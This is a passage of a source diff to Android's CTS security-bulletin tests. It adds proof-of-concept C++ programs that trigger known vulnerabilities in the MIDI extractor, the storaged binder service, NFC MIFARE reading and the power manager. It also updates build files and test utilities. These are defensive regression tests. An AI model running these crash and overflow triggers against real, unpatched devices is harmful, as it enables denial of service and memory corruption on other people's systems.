--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0383/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp
new file mode 100644
index 0000000..5d00345
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0384",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/include/media/stagefright",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp
new file mode 100644
index 0000000..43da25d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp
new file mode 100644
index 0000000..5a32f57
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0385",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libmedia/include/android",
+ "frameworks/av/media/libmedia/include",
+ "frameworks/av/media/libstagefright/foundation/include",
+ "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation",
+ "frameworks/av/media/libstagefright/include",
+ "frameworks/av/media/libstagefright/include/media/stagefright",
+ ],
+ shared_libs: [
+ "libutils",
+ "libmediandk",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp
new file mode 100644
index 0000000..43da25d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp
index 70c3eed..c32cb4a 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp
@@ -27,9 +27,6 @@
"-DENABLE_SELECTIVE_OVERLOADING",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
include_dirs: [
"system/nfc/src/nfc/include/",
@@ -41,7 +38,6 @@
shared_libs: [
"libnfc-nci",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp
index 1876c60..1c231b7 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp
@@ -22,14 +22,10 @@
"poc.cpp",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
shared_libs: [
"libmediandk",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp
new file mode 100644
index 0000000..30915d5
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0330",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libutils",
+ "libbinder",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp
new file mode 100644
index 0000000..4d7254f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp
@@ -0,0 +1,70 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+#include <pthread.h>
+#include <unistd.h>
+#include "../includes/common.h"
+
+using namespace android;
+
+static int userId = 0;
+constexpr int kMaxThreads = 2;
+constexpr int kMaxUsers = 1024 * 1024;
+constexpr int kSleepDuration = 5;
+
+
+static void *trigger_onUserStarted(void *p __attribute__((unused))) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("storaged"));
+
+ if (not service) {
+ return nullptr;
+ }
+
+ while (userId < kMaxUsers) {
+ Parcel data, reply;
+ data.writeInterfaceToken(service->getInterfaceDescriptor());
+ data.writeInt32(++userId);
+ service->transact(1, data, &reply, 0);
+ }
+
+ return nullptr;
+}
+
+int main() {
+ pthread_t threads[kMaxThreads];
+
+ for (int t = 0; t < kMaxThreads; ++t) {
+ pthread_create(&threads[t], nullptr, trigger_onUserStarted, nullptr);
+ }
+ for (int t = 0; t < kMaxThreads; ++t) {
+ pthread_join(threads[t], nullptr);
+ }
+
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("storaged"));
+ if (service) {
+ break;
+ }
+ sleep(kSleepDuration);
+ }
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp
new file mode 100644
index 0000000..5cad1e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0430",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
+
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
new file mode 100644
index 0000000..947f46a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
@@ -0,0 +1,87 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_int.h>
+#include <rw_int.h>
+
+#define RW_MFC_STATE_READ_NDEF 0x03
+#define RW_MFC_SUBSTATE_READ_BLOCK 0x03
+
+extern tRW_CB rw_cb;
+
+void GKI_freebuf(void*) {
+}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {
+}
+
+void GKI_stop_timer(uint8_t) {
+}
+
+void cback(tRW_EVENT, tRW_DATA*) {
+}
+
+int main() {
+ tRW_MFC_CB* p_mfc = &rw_cb.tcb.mfc;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t selres = 1;
+ uint8_t uid[MFC_UID_LEN] = { 1 };
+ if (rw_mfc_select(selres, uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ p_mfc->state = RW_MFC_STATE_READ_NDEF;
+ p_mfc->substate = RW_MFC_SUBSTATE_READ_BLOCK;
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+
+ tNFC_CONN* p_data = (tNFC_CONN*) malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.status = NFC_STATUS_OK;
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ NFC_HDR* mfc_data = (NFC_HDR*) p_data->data.p_data;
+ mfc_data->len = 0x10;
+ mfc_data->offset = 0;
+ p_mfc->ndef_length = 1024;
+ p_mfc->p_ndef_buffer = (uint8_t*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_mfc->p_ndef_buffer)) {
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ rw_cb.p_cback = cback;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_mfc->p_ndef_buffer);
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp
new file mode 100644
index 0000000..5cfd2f5
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0439",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp"
+ ],
+ shared_libs : [
+ "libutils",
+ "libbinder",
+ ],
+ cflags: [
+ "-DDO_NOT_CHECK_MANUAL_BINDER_INTERFACES",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp
new file mode 100644
index 0000000..65cab13
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp
@@ -0,0 +1,49 @@
+/*
+ * Copyright 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+using namespace android;
+
+int main() {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> binder = sm->getService(String16("power"));
+ if (!binder) {
+ return EXIT_FAILURE;
+ }
+ Parcel data, result;
+ data.writeInterfaceToken(String16("android.os.IPowerManager"));
+ char d[] = {static_cast<char>(0xc9),
+ static_cast<char>(0xa4),
+ 0x10,
+ static_cast<char>(0xd4),
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x27,
+ 0x00,
+ 0x5a,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00};
+ data.write(d, sizeof(d));
+ binder->transact(6, data, &result);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp b/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp
index 393848d..0629ec3 100644
--- a/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp
@@ -20,15 +20,22 @@
#include <codecvt>
#include <fstream>
#include <iostream>
+#include "../includes/common.h"
const char16_t* spec = u"";
const char16_t* host = u"";
int main(int argc, char *argv[]) {
+ bool shouldRunMultipleTimes = false;
if (argc != 2) {
- std::cout << "incorrect number of arguments" << std::endl;
- std::cout << "usage: ./pacrunner mypac.pac" << std::endl;
- return EXIT_FAILURE;
+ if (argc != 3) {
+ std::cout << "incorrect number of arguments" << std::endl;
+ std::cout << "usage: ./pacrunner mypac.pac (or)" << std::endl;
+ std::cout << "usage: ./pacrunner mypac.pac true" << std::endl;
+ return EXIT_FAILURE;
+ } else {
+ shouldRunMultipleTimes = true;
+ }
}
ProxyResolverV8Handle* handle = ProxyResolverV8Handle_new();
@@ -50,7 +57,10 @@
std::codecvt_utf8_utf16<char16_t>, char16_t>{}.from_bytes(u8Script);
ProxyResolverV8Handle_SetPacScript(handle, u16Script.data());
- ProxyResolverV8Handle_GetProxyForURL(handle, spec, host);
+ time_t currentTime = start_timer();
+ do {
+ ProxyResolverV8Handle_GetProxyForURL(handle, spec, host);
+ } while (shouldRunMultipleTimes && timer_active(currentTime));
ProxyResolverV8Handle_delete(handle);
return EXIT_SUCCESS;
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
index 5d22ed1..cf48079 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
@@ -23,6 +23,7 @@
import com.android.ddmlib.IShellOutputReceiver;
import com.android.ddmlib.NullOutputReceiver;
import com.android.ddmlib.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.device.NativeDevice;
import com.android.tradefed.log.LogUtil.CLog;
@@ -34,6 +35,7 @@
import java.io.OutputStream;
import java.util.concurrent.TimeoutException;
import java.util.List;
+import java.util.Map;
import java.util.regex.Pattern;
import java.util.concurrent.TimeUnit;
import java.util.Scanner;
@@ -48,8 +50,9 @@
import java.util.regex.Pattern;
import java.lang.Thread;
+
import static org.junit.Assert.*;
-import junit.framework.Assert;
+import static org.junit.Assume.*;
public class AdbUtils {
@@ -60,6 +63,7 @@
public static class pocConfig {
String binaryName;
String arguments;
+ Map<String, String> envVars;
String inputFilesDestination;
ITestDevice device;
CrashUtils.Config config;
@@ -162,8 +166,25 @@
*/
public static int runPoc(String pocName, ITestDevice device, int timeout,
String arguments, IShellOutputReceiver receiver) throws Exception {
+ return runPoc(pocName, device, timeout, arguments, null, receiver);
+ }
+
+ /**
+ * Pushes and runs a binary with arguments to the selected device and
+ * ignores any of its output.
+ *
+ * @param pocName name of the poc binary
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @param arguments input arguments for the poc
+ * @param envVars run the poc with environment variables
+ * @param receiver the type of receiver to run against
+ */
